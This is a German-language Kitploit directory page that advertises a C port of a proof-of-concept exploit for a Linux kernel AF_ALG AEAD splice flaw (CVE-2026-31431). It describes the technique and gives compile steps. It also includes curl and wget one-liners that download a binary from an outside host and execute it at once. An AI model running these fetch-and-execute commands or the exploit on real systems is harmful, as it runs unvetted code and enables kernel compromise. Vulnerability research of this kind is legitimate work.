Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-31431 — C-Port eines Proof-of-Concept, der einen AF_ALG-AEAD-Splice-Logikfehler im Linux-Kernel (CVE-2026-31431) für Bildungsforschung ausnutzt. | Kitploit
Tools/GitHubGitHub/offsecguy/cve-2026-31431
SchwachstellenanalyseExploitationBinary-Exploitation
GitHuboffsecguy/cve-2026-31431

CVE-2026-31431

C-Port eines Proof-of-Concept, der einen AF_ALG-AEAD-Splice-Logikfehler im Linux-Kernel (CVE-2026-31431) für Bildungsforschung ausnutzt.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

copy.fail — AF_ALG AEAD splice-Primitive (CVE-2026-31431)

Übersicht

Dieses Projekt ist ein C-Port des ursprünglichen Python-Prototyps von offsecguy.
Es nutzt die Linux-Kernel-Krypto-API (AF_ALG) mit:

  • authencesn(hmac(sha256),cbc(aes)) AEAD-Modus
  • MSG_MORE-Flag
  • splice()-Systemaufruf

Die Technik führt Daten aus einem schreibgeschützten Dateideskriptor durch einen Krypto-Socket und verarbeitet sie blockweise.


⚙️ Kompilierung

Option 1 — musl (statischer Build)

root@kitploit:~
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz

Option 2 — GCC statisch

root@kitploit:~
gcc exp.c -o exp -lz -s -static

Option 3 — GCC dynamisch

root@kitploit:~
gcc exp.c -o exp -lz -s

🚀 Remote-Ausführung

root@kitploit:~
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
root@kitploit:~
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp

⚠️ Hinweise

  • Erfordert Linux-Kernel-Unterstützung für AF_ALG
  • Verwendet zlib zur Dekompression
  • Entwickelt für Low-Level-Kernel-Krypto-Interaktion und Experimente

Haftungsausschluss

Dieser Code wird nur für Bildungs- und Forschungszwecke bereitgestellt.
Verwenden Sie ihn verantwortungsvoll und nur auf Systemen, für deren Test Sie autorisiert sind.

Tool herunterladen